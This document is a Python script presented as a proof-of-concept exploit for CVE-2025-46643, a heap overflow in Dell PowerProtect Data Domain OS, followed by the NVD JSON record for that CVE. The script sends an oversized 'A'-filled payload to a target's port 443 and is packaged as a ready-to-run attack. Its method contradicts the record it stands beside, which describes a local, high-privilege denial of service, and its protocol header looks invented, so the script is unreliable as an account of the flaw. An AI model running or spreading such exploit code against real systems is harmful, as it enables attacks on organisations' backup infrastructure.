CVE-2025-46643

# CVE-2025-46643 PoC - Dell PowerProtect Data Domain Heap Overflow # This PoC demonstrates the heap-based buffer overflow in DD OS # Note: This is for educational and authorized testing purposes only import socket import struct import sys def create_exploit_payload(): """Generate payload to trigger heap buffer overflow""" # Target specific memory region with oversized input header = b'DD_PROTECT_CMD' # Craft oversized data to overflow heap buffer overflow_size = 8192 overflow_data = b'A' * overflow_size # Add controlled data that may overwrite adjacent heap structures controlled_data = struct.pack('<Q', 0x4141414141414141) * 4 payload = header + overflow_data + controlled_data return payload def send_exploit(target_ip, target_port=443): """Send exploit payload to vulnerable DD OS""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(30) sock.connect((target_ip, target_port)) payload = create_exploit_payload() sock.send(payload) print(f'[*] Exploit payload sent ({len(payload)} bytes)') response = sock.recv(1024) print(f'[*] Received response: {response[:100]}') sock.close() return True except Exception as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: {sys.argv[0]} <target_ip>') sys.exit(1) target = sys.argv[1] print(f'[*] Target: {target}') print(f'[*] Exploiting CVE-2025-46643...') send_exploit(target)

{"cve": {"id": "CVE-2025-46643", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:06.443", "lastModified": "2026-02-05T13:26:58.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS 2023 release versions 7.10.1.0 through 7.10.1.70, contain a Heap-based Buffer Overflow vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service."}, {"lang": "es", "value": "Dell PowerProtect Data Domain con el sistema operativo Data Domain (DD OS) de las versiones Feature Release 7.7.1.0 a 8.4.0.0, la versión LTS2025 8.3.1.10, las versiones LTS2024 7.13.1.0 a 7.13.1.40, y las versiones LTS 2023 7.10.1.0 a 7.10.1.70, contienen una vulnerabilidad de desbordamiento de búfer basado en montículo. Un atacante con altos privilegios y acceso local podría potencialmente explotar esta vulnerabilidad, lo que llevaría a una denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.80", "matchCriteriaId": "18AD8BC6-ABF7-4990-91C6-D228BBE4B9FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.50", "matchCriteriaId": "00F138B9-4AB9-4B79-BBEC-F5A48E2E0B05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.20", "matchCriteriaId": "7B8DA06B-076A-495E-9BD0-246BF1E54E26"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "FF73C39B-827B-4A68-9708-08345F6EF979"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}